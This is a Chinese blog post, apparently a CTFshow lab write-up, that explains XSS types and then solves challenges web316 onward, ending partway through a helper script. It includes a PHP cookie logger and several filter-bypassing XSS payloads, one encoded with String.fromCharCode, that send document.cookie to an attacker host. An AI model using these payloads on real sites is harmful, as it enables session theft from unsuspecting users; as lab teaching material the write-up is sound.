<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#0078E7"><meta name="author" content="Hsad"><meta name="copyright" content="Hsad"><meta name="generator" content="Hexo 7.2.0"><meta name="theme" content="hexo-theme-yun"><title>web入门-xss | Hsad's Blog</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/star-markdown-css@0.4.1/dist/yun/yun-markdown.min.css"><link rel="stylesheet" href="https://fastly.jsdelivr.net/npm/prism-theme-vars/base.css"><script src="https://fastly.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>function initScrollReveal() {
  [".post-card",".markdown-body img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
}
document.addEventListener("DOMContentLoaded", initScrollReveal);
document.addEventListener("pjax:success", initScrollReveal);
</script><link rel="icon" type="image/png" href="/favicon.ico"><link rel="mask-icon" href="/favicon.ico" color="#0078E7"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="preconnect" href="https://fastly.jsdelivr.net/npm/" crossorigin><script id="yun-config">
    window.Yun = {}
    window.CONFIG = {"hostname":"hsad.xyz","root":"/","title":"所以你弃权","version":"1.10.11","mode":"auto","copycode":true,"page":{"isPost":true},"i18n":{"placeholder":"搜索...","empty":"找不到您查询的内容: ${query}","hits":"找到 ${hits} 条结果","hits_time":"找到 ${hits} 条结果（用时 ${time} 毫秒）"},"anonymous_image":"https://cdn.yunyoujun.cn/img/avatar/none.jpg","say":{"api":"https://el-bot-api.vercel.app/api/words/young"},"fireworks":{"colors":null},"vendors":{"host":"https://fastly.jsdelivr.net/npm/","darken":"https://fastly.jsdelivr.net/npm/darken@1.5.0"}};
  </script><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script src="/js/hexo-theme-yun.js" type="module"></script><meta name="description" content="前言XSS原理跨站脚本攻击（XSS），是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。 HTML是一种超文本标记语言，通过将一些字符特殊地对待来区别文本和标记，例如，小于符号（&lt;）被看作是HTML标签的开始，之间的字符是页面的标题等等。当动态页面中插入的内容含">
<meta property="og:type" content="article">
<meta property="og:title" content="web入门-xss">
<meta property="og:url" content="https://hsad.xyz/2024/07/24/web%E5%85%A5%E9%97%A8-xss/index.html">
<meta property="og:site_name" content="Hsad&#39;s Blog">
<meta property="og:description" content="前言XSS原理跨站脚本攻击（XSS），是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。 HTML是一种超文本标记语言，通过将一些字符特殊地对待来区别文本和标记，例如，小于符号（&lt;）被看作是HTML标签的开始，之间的字符是页面的标题等等。当动态页面中插入的内容含">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hsad.xyz/2024/07/24/web%E5%85%A5%E9%97%A8-xss/web%E5%85%A5%E9%97%A8-xss%5Cweb320.png">
<meta property="og:image" content="https://hsad.xyz/2024/07/24/web%E5%85%A5%E9%97%A8-xss/web329.png">
<meta property="og:image" content="https://hsad.xyz/2024/07/24/web%E5%85%A5%E9%97%A8-xss/web329_2.png">
<meta property="og:image" content="https://hsad.xyz/2024/07/24/web%E5%85%A5%E9%97%A8-xss/web330.png">
<meta property="article:published_time" content="2024-07-24T02:53:07.000Z">
<meta property="article:modified_time" content="2024-07-24T12:08:15.437Z">
<meta property="article:author" content="Hsad">
<meta property="article:tag" content="CTFshow">
<meta property="article:tag" content="xss">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hsad.xyz/2024/07/24/web%E5%85%A5%E9%97%A8-xss/web%E5%85%A5%E9%97%A8-xss%5Cweb320.png"><script>(function() {
  if (CONFIG.mode !== 'auto') return
  const prefersDark = window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches
  const setting = localStorage.getItem('darken-mode') || 'auto'
  if (setting === 'dark' || (prefersDark && setting !== 'light'))
    document.documentElement.classList.toggle('dark', true)
})()</script></head><body><script src="https://code.iconify.design/2/2.1.1/iconify.min.js"></script><script>// Define global variable
IconifyProviders = {
  // Empty prefix: overwrite default API provider configuration
  '': {
    // Use custom API first, use Iconify public API as backup
    resources: [
        'https://api.iconify.design',
    ],
    // Wait for 1 second before switching API hosts
    rotate: 1000,
  },
};</script><script defer src="https://fastly.jsdelivr.net/npm/animejs@latest"></script><script defer src="/js/ui/fireworks.js" type="module"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js" type="module"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><span class="icon iconify" data-icon="ri:list-ordered"></span></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><span class="icon iconify" data-icon="ri:passport-line"></span></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="Hsad"><img width="96" loading="lazy" src="/images/avatar.jpg" alt="Hsad"><span class="site-author-status" title="凉">☺️</span></a><div class="site-author-name"><a href="/about/">Hsad</a></div><span class="site-name">Hsad's Blog</span><sub class="site-subtitle">一个人的世界</sub><div class="site-description">翻着我们的照片 想念若隐若现</div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:home-4-line"></span></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:archive-line"></span></span><span class="site-state-item-count">33</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:folder-2-line"></span></span><span class="site-state-item-count">6</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="site-state-item-count">31</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="文档"><span class="site-state-item-icon"><span class="icon iconify" data-icon="ri:settings-line"></span></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://qm.qq.com/cgi-bin/qm/qr?k=EYiK7-b5ur1mWxbX7aV2AEBsuoW9c732" title="QQ" target="_blank" style="color:orange"><span class="icon iconify" data-icon="ri:qq-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/watanabe-hsad" title="GitHub" target="_blank" style="color:#181717"><span class="icon iconify" data-icon="ri:github-line"></span></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="mailto:dubian.zzy@outlook.com" title="E-Mail" target="_blank" style="color:#8E71C1"><span class="icon iconify" data-icon="ri:mail-line"></span></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><span class="icon iconify" data-icon="ri:genderless-line"></span></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><span class="icon iconify" data-icon="ri:contrast-2-line"></span></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#XSS%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text">XSS原理</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#XSS%E7%B1%BB%E5%9E%8B%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.2.</span> <span class="toc-text">XSS类型介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8B"><span class="toc-number">1.2.1.</span> <span class="toc-text">反射型</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8B"><span class="toc-number">1.2.2.</span> <span class="toc-text">存储型</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#DOM-%E5%9E%8B"><span class="toc-number">1.2.3.</span> <span class="toc-text">DOM 型</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web316-333"><span class="toc-number">2.</span> <span class="toc-text">web316-333</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#web316-cookie-script"><span class="toc-number">2.1.</span> <span class="toc-text">web316(cookie script)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web317-img"><span class="toc-number">2.2.</span> <span class="toc-text">web317(img)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web318-body-iframe"><span class="toc-number">2.3.</span> <span class="toc-text">web318(body iframe)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web319"><span class="toc-number">2.4.</span> <span class="toc-text">web319</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web320-326-%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87-fromCharCode"><span class="toc-number">2.5.</span> <span class="toc-text">web320-326(空格绕过  fromCharCode)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web327-%E5%AD%98%E5%82%A8%E5%9E%8Bxss"><span class="toc-number">2.6.</span> <span class="toc-text">web327(存储型xss)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web328-%E4%BC%AA%E9%80%A0Cookie"><span class="toc-number">2.7.</span> <span class="toc-text">web328(伪造Cookie)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web329"><span class="toc-number">2.8.</span> <span class="toc-text">web329</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web330"><span class="toc-number">2.9.</span> <span class="toc-text">web330</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web331"><span class="toc-number">2.10.</span> <span class="toc-text">web331</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web332"><span class="toc-number">2.11.</span> <span class="toc-text">web332</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#web333"><span class="toc-number">2.12.</span> <span class="toc-text">web333</span></a></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="hty-card post-block" itemscope itemtype="https://schema.org/Article" style="--smc-primary:#0078E7;"><link itemprop="mainEntityOfPage" href="https://hsad.xyz/2024/07/24/web%E5%85%A5%E9%97%A8-xss/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Hsad"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Hsad's Blog"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">web入门-xss</h1><div class="post-meta"><div class="post-time"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:calendar-line"></span></span> <time title="创建时间：2024-07-24 10:53:07" itemprop="dateCreated datePublished" datetime="2024-07-24T10:53:07+08:00">2024-07-24</time></div><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><span class="icon iconify" data-icon="ri:folder-line"></span></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E5%AE%89%E5%85%A8%E7%9B%B8%E5%85%B3/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">安全相关</span></a></span> > <span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category-item" href="/categories/%E5%AE%89%E5%85%A8%E7%9B%B8%E5%85%B3/CTF/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">CTF</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag-item" href="/tags/CTFshow/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">CTFshow</span></a><a class="tag-item" href="/tags/xss/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><span class="icon iconify" data-icon="ri:price-tag-3-line"></span></span><span class="tag-name">xss</span></a></span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body"><h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><h4 id="XSS原理"><a href="#XSS原理" class="headerlink" title="XSS原理"></a>XSS原理</h4><p>跨站脚本攻击（XSS），是最普遍的Web应用安全漏洞。这类漏洞能够使得攻击者嵌入恶意脚本代码到正常用户会访问到的页面中，当正常用户访问该页面时，则可导致嵌入的恶意脚本代码的执行，从而达到恶意攻击用户的目的。</p>
<p>HTML是一种超文本标记语言，通过将一些字符特殊地对待来区别文本和标记，例如，小于符号（&lt;）被看作是HTML标签的开始，之间的字符是页面的标题等等。当动态页面中插入的内容含有这些特殊字符（如&lt;）时，用户浏览器会将其误认为是插入了HTML标签，当这些HTML标签引入了一段JavaScript脚本时，这些脚本程序就将会在用户浏览器中执行。所以，当这些特殊字符不能被动态页面检查或检查出现失误时，就将会产生XSS漏洞。</p>
<p>俗称的见框就插。个人理解，由于HTML的标签特性，可以通过网页的输入框输入脚本代码，使网页执行恶意脚本，达到攻击的目的。</p>
<h4 id="XSS类型介绍"><a href="#XSS类型介绍" class="headerlink" title="XSS类型介绍"></a>XSS类型介绍</h4><h5 id="反射型"><a href="#反射型" class="headerlink" title="反射型"></a><strong>反射型</strong></h5><p>反射型跨站脚本（Reflected Cross-Site Scripting）是最常见，也是使用最广的一种，可将恶意脚本附加到 URL 地址的参数中</p>
<p>反射型 XSS 的利用一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 Cookies 或进行钓鱼欺骗。</p>
<h5 id="存储型"><a href="#存储型" class="headerlink" title="存储型"></a>存储型</h5><p>持久型跨站脚本（Persistent Cross-Site Scripting）也等同于存储型跨站脚本（Stored Cross-Site Scripting）。</p>
<p>此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本，攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。持久型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。</p>
<h5 id="DOM-型"><a href="#DOM-型" class="headerlink" title="DOM 型"></a>DOM 型</h5><p>传统的 XSS 漏洞一般出现在服务器端代码中，而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞，所以，受客户端浏览器的脚本代码所影响。客户端 JavaScript 可以访问浏览器的 DOM 文本对象模型，因此能够决定用于加载当前页面的 URL。换句话说，客户端的脚本程序可以通过 DOM 动态地检查和修改页面内容，它不依赖于服务器端的数据，而从客户端获得 DOM 中的数据（如从 URL 中提取数据）并在本地执行。另一方面，浏览器用户可以操纵 DOM 中的一些对象，例如 URL、location 等。用户在客户端输入的数据如果包含了恶意 JavaScript 脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到基于 DOM 的 XSS 攻击。</p>
<p>常见的标签</p>
<p>1.alert()</p>
<ul>
<li>alert(‘xss’)</li>
<li>alert(“xss”)</li>
<li>alert(&#x2F;xss&#x2F;)</li>
<li>alert(document.cookie)</li>
</ul>
<p>2.confirm()</p>
<ul>
<li>confirm(‘xss’)</li>
<li>confirm(“xss”)</li>
<li>confirm(&#x2F;xss&#x2F;)</li>
<li>confirm(document.cookie)</li>
</ul>
<p>3.prompt()</p>
<ul>
<li>prompt(‘xss’)</li>
<li>prompt(“xss”)</li>
<li>prompt(&#x2F;xss&#x2F;)</li>
<li>prompt(document.coolkie)</li>
<li>(&#x2F;xss&#x2F;) 以上三种方法都可以实现，但是会多出两个‘&#x2F;’</li>
</ul>
<p>4.document.write()</p>
<ul>
<li>document.write(‘</li>
</ul>
<h3 id="web316-333"><a href="#web316-333" class="headerlink" title="web316-333"></a>web316-333</h3><h4 id="web316-cookie-script"><a href="#web316-cookie-script" class="headerlink" title="web316(cookie script)"></a>web316(cookie script)</h4><p>可以使用xss平台，也可以使用服务器自己搭建</p>
<p>在服务器上面放一个接受Cookie的文件。</p>
<pre class="language-php" data-language="php"><code class="language-php"><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
	<span class="token variable">$cookie</span> <span class="token operator">=</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string single-quoted-string">'cookie'</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
	<span class="token variable">$time</span> <span class="token operator">=</span> <span class="token function">date</span><span class="token punctuation">(</span><span class="token string single-quoted-string">'Y-m-d h:i:s'</span><span class="token punctuation">,</span> <span class="token function">time</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token variable">$log</span> <span class="token operator">=</span> <span class="token function">fopen</span><span class="token punctuation">(</span><span class="token string double-quoted-string">"cookie.txt"</span><span class="token punctuation">,</span> <span class="token string double-quoted-string">"a"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">fwrite</span><span class="token punctuation">(</span><span class="token variable">$log</span><span class="token punctuation">,</span><span class="token variable">$time</span><span class="token operator">.</span><span class="token string single-quoted-string">':    '</span><span class="token operator">.</span> <span class="token variable">$cookie</span> <span class="token operator">.</span> <span class="token string double-quoted-string">"\n"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
	<span class="token function">fclose</span><span class="token punctuation">(</span><span class="token variable">$log</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?></span></span>
</code></pre>

<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>script<span class="token operator">></span>location<span class="token punctuation">.</span>href<span class="token operator">=</span><span class="token string">"http://xxxxxx/cookie.php?cookie="</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span></code></pre>

<p>cookie.txt里面就可以看到flag，或者查看日志</p>
<h4 id="web317-img"><a href="#web317-img" class="headerlink" title="web317(img)"></a>web317(img)</h4><p>过滤了<code>script</code>可以使用<code>img</code></p>
<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>img src<span class="token operator">=</span><span class="token string">""</span> onerror<span class="token operator">=</span>location<span class="token punctuation">.</span>href<span class="token operator">=</span><span class="token string">"http://xxxxxx/cookie.php?cookie="</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie <span class="token operator">></span></code></pre>

<h4 id="web318-body-iframe"><a href="#web318-body-iframe" class="headerlink" title="web318(body iframe)"></a>web318(body iframe)</h4><p>过滤了<code>img</code>使用<code>body</code>或者<code>iframe</code></p>
<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>body onload<span class="token operator">=</span>location<span class="token punctuation">.</span>href<span class="token operator">=</span><span class="token string">"http://xxxxxxx/xss/cookie.php?cookie="</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<span class="token operator">></span>
<span class="token operator">&lt;</span>iframe οnlοad<span class="token operator">=</span>document<span class="token punctuation">.</span>location<span class="token operator">=</span><span class="token string">'http://xxxxxxx/xss/cookie.php?cookie='</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<span class="token operator">></span></code></pre>

<h4 id="web319"><a href="#web319" class="headerlink" title="web319"></a>web319</h4><p>同318</p>
<h4 id="web320-326-空格绕过-fromCharCode"><a href="#web320-326-空格绕过-fromCharCode" class="headerlink" title="web320-326(空格绕过  fromCharCode)"></a>web320-326(空格绕过  fromCharCode)</h4><p>过滤了<code>script</code>，<code>img</code>，<code>  </code>, <code>iframe</code>。</p>
<p>web322过滤了xss</p>
<p>空格可以用<code>%09</code>、<code>tab</code>、<code>/</code>、<code>/**/</code>、<code>%0a</code>代替。</p>
<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>body<span class="token comment">/**/</span>onload<span class="token operator">=</span>location<span class="token punctuation">.</span>href<span class="token operator">=</span><span class="token string">"http://xxxxxxx/xss/cookie.php?cookie="</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<span class="token operator">></span>
<span class="token operator">&lt;</span>iframe<span class="token comment">/**/</span>οnlοad<span class="token operator">=</span>document<span class="token punctuation">.</span>location<span class="token operator">=</span><span class="token string">'http://xxxxxxx/xss/cookie.php?cookie='</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<span class="token operator">></span></code></pre>

<p>扩展一下payload：</p>
<p>String.fromCharCode()函数：ascii码转字符</p>
<p>参考：<a target="_blank" rel="noopener" href="https://www.runoob.com/jsref/jsref-fromcharcode.html">https://www.runoob.com/jsref/jsref-fromcharcode.html</a></p>
<p>String.fromCharCode(111,110,108,111,97,100); 控制台运行结果如下：</p>
<p><img src="web%E5%85%A5%E9%97%A8-xss%5Cweb320.png" loading="lazy"></p>
<p>用它我可以构造一个payload：</p>
<pre class="language-javascript" data-language="javascript"><code class="language-javascript"><span class="token operator">&lt;</span>body<span class="token comment">/**/</span>οnlοad<span class="token operator">=</span>document<span class="token punctuation">.</span><span class="token function">write</span><span class="token punctuation">(</span>String<span class="token punctuation">.</span><span class="token function">fromCharCode</span><span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">,</span><span class="token number">115</span><span class="token punctuation">,</span><span class="token number">99</span><span class="token punctuation">,</span><span class="token number">114</span><span class="token punctuation">,</span><span class="token number">105</span><span class="token punctuation">,</span><span class="token number">112</span><span class="token punctuation">,</span><span class="token number">116</span><span class="token punctuation">,</span><span class="token number">62</span><span class="token punctuation">,</span><span class="token number">100</span><span class="token punctuation">,</span><span class="token number">111</span><span class="token punctuation">,</span><span class="token number">99</span><span class="token punctuation">,</span><span class="token number">117</span><span class="token punctuation">,</span><span class="token number">109</span><span class="token punctuation">,</span><span class="token number">101</span><span class="token punctuation">,</span><span class="token number">110</span><span class="token punctuation">,</span><span class="token number">116</span><span class="token punctuation">,</span><span class="token number">46</span><span class="token punctuation">,</span><span class="token number">108</span><span class="token punctuation">,</span><span class="token number">111</span><span class="token punctuation">,</span><span class="token number">99</span><span class="token punctuation">,</span><span class="token number">97</span><span class="token punctuation">,</span><span class="token number">116</span><span class="token punctuation">,</span><span class="token number">105</span><span class="token punctuation">,</span><span class="token number">111</span><span class="token punctuation">,</span><span class="token number">110</span><span class="token punctuation">,</span><span class="token number">46</span><span class="token punctuation">,</span><span class="token number">104</span><span class="token punctuation">,</span><span class="token number">114</span><span class="token punctuation">,</span><span class="token number">101</span><span class="token punctuation">,</span><span class="token number">102</span><span class="token punctuation">,</span><span class="token number">61</span><span class="token punctuation">,</span><span class="token number">34</span><span class="token punctuation">,</span><span class="token number">104</span><span class="token punctuation">,</span><span class="token number">116</span><span class="token punctuation">,</span><span class="token number">116</span><span class="token punctuation">,</span><span class="token number">112</span><span class="token punctuation">,</span><span class="token number">58</span><span class="token punctuation">,</span><span class="token number">47</span><span class="token punctuation">,</span><span class="token number">47</span><span class="token punctuation">,</span><span class="token number">49</span><span class="token punctuation">,</span><span class="token number">49</span><span class="token punctuation">,</span><span class="token number">55</span><span class="token punctuation">,</span><span class="token number">46</span><span class="token punctuation">,</span><span class="token number">55</span><span class="token punctuation">,</span><span class="token number">50</span><span class="token punctuation">,</span><span class="token number">46</span><span class="token punctuation">,</span><span class="token number">55</span><span class="token punctuation">,</span><span class="token number">48</span><span class="token punctuation">,</span><span class="token number">46</span><span class="token punctuation">,</span><span class="token number">49</span><span class="token punctuation">,</span><span class="token number">56</span><span class="token punctuation">,</span><span class="token number">54</span><span class="token punctuation">,</span><span class="token number">47</span><span class="token punctuation">,</span><span class="token number">120</span><span class="token punctuation">,</span><span class="token number">115</span><span class="token punctuation">,</span><span class="token number">115</span><span class="token punctuation">,</span><span class="token number">47</span><span class="token punctuation">,</span><span class="token number">99</span><span class="token punctuation">,</span><span class="token number">111</span><span class="token punctuation">,</span><span class="token number">111</span><span class="token punctuation">,</span><span class="token number">107</span><span class="token punctuation">,</span><span class="token number">105</span><span class="token punctuation">,</span><span class="token number">101</span><span class="token punctuation">,</span><span class="token number">46</span><span class="token punctuation">,</span><span class="token number">112</span><span class="token punctuation">,</span><span class="token number">104</span><span class="token punctuation">,</span><span class="token number">112</span><span class="token punctuation">,</span><span class="token number">63</span><span class="token punctuation">,</span><span class="token number">99</span><span class="token punctuation">,</span><span class="token number">111</span><span class="token punctuation">,</span><span class="token number">111</span><span class="token punctuation">,</span><span class="token number">107</span><span class="token punctuation">,</span><span class="token number">105</span><span class="token punctuation">,</span><span class="token number">101</span><span class="token punctuation">,</span><span class="token number">61</span><span class="token punctuation">,</span><span class="token number">34</span><span class="token punctuation">,</span><span class="token number">43</span><span class="token punctuation">,</span><span class="token number">100</span><span class="token punctuation">,</span><span class="token number">111</span><span class="token punctuation">,</span><span class="token number">99</span><span class="token punctuation">,</span><span class="token number">117</span><span class="token punctuation">,</span><span class="token number">109</span><span class="token punctuation">,</span><span class="token number">101</span><span class="token punctuation">,</span><span class="token number">110</span><span class="token punctuation">,</span><span class="token number">116</span><span class="token punctuation">,</span><span class="token number">46</span><span class="token punctuation">,</span><span class="token number">99</span><span class="token punctuation">,</span><span class="token number">111</span><span class="token punctuation">,</span><span class="token number">111</span><span class="token punctuation">,</span><span class="token number">107</span><span class="token punctuation">,</span><span class="token number">105</span><span class="token punctuation">,</span><span class="token number">101</span><span class="token punctuation">,</span><span class="token number">60</span><span class="token punctuation">,</span><span class="token number">47</span><span class="token punctuation">,</span><span class="token number">115</span><span class="token punctuation">,</span><span class="token number">99</span><span class="token punctuation">,</span><span class="token number">114</span><span class="token punctuation">,</span><span class="token number">105</span><span class="token punctuation">,</span><span class="token number">112</span><span class="token punctuation">,</span><span class="token number">116</span><span class="token punctuation">,</span><span class="token number">62</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token operator">></span>

<span class="token operator">&lt;</span>script<span class="token operator">></span>document<span class="token punctuation">.</span>location<span class="token punctuation">.</span>href<span class="token operator">=</span><span class="token string">"http://117.72.70.186/xss/cookie.php?cookie="</span><span class="token operator">+</span>document<span class="token punctuation">.</span>cookie<span class="token operator">&lt;</span><span class="token operator">/</span>script<span class="token operator">></span></code></pre>

<p>String2ascii.py</p>
<pre class="language-python" data-language="python"><code class="language-python">input_str <span class="token operator">=</span> <span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">"请输入字符串: "</span><span class="token punctuation">)</span>  <span class="token comment"># 获取用户输入的字符串</span>
ascii_list <span class="token operator">=</span> <span class="token punctuation">[</span><span class="token punctuation">]</span>

<span class="token comment"># 遍历字符串，将每个字符转换为ASCII码，并添加到列表中</span>
<span class="token keyword">for</span> char <span class="token keyword">in</span> input_str<span class="token punctuation">:</span>
    ascii_code <span class="token operator">=</span> <span class="token builtin">ord</span><span class="token punctuation">(</span>char<span class="token punctuation">)</span>  <span class="token comment"># 使用ord()函数获取字符的ASCII码</span>
    ascii_list<span class="token punctuation">.</span>append<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span>ascii_code<span class="token punctuation">)</span><span class="token punctuation">)</span>  <span class="token comment"># 将ASCII码转换为字符串并添加到列表</span>

<span class="token comment"># 将列表中的ASCII码用逗号隔开，并打印结果</span>
result <span class="token operator">=</span> <span class="token string">','</span><span class="token punctuation">.</span>join<span class="token punctuation">(</span>ascii_list<span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"转换后的ASCII码:"</span><span class="token punctuation">,</span> result<span class="token punctuation">)</span>
</code></pre>

<p>Ascii2string.py</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">ascii_to_string</span><span class="token punctuation">(</span>ascii_str<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token comment"># 将以逗号分隔的ASCII码字符串分割成一个列表</span>
    ascii_list <span class="token operator">=</span> ascii_str<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">','</span><span class="token punctuation">)</span>

    <span class="token comment"># 使用列表推导式将ASCII码转换为字符，并连接成一个字符串</span>
    result <span class="token operator">=</span> <span class="token string">''</span><span class="token punctuation">.</span>join<span class="token punctuation">(</span><span class="token builtin">chr</span><span class="token punctuation">(</span><span class="token builtin">int</span><span class="token punctuation">(</span>code<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token keyword">for</span> code <span class="token keyword">in</span> ascii_list<span class="token punctuation">)</span>
    <span class="token keyword">return</span> result


<span class="token comment"># 输入以逗号分隔的ASCII码字符串</span>
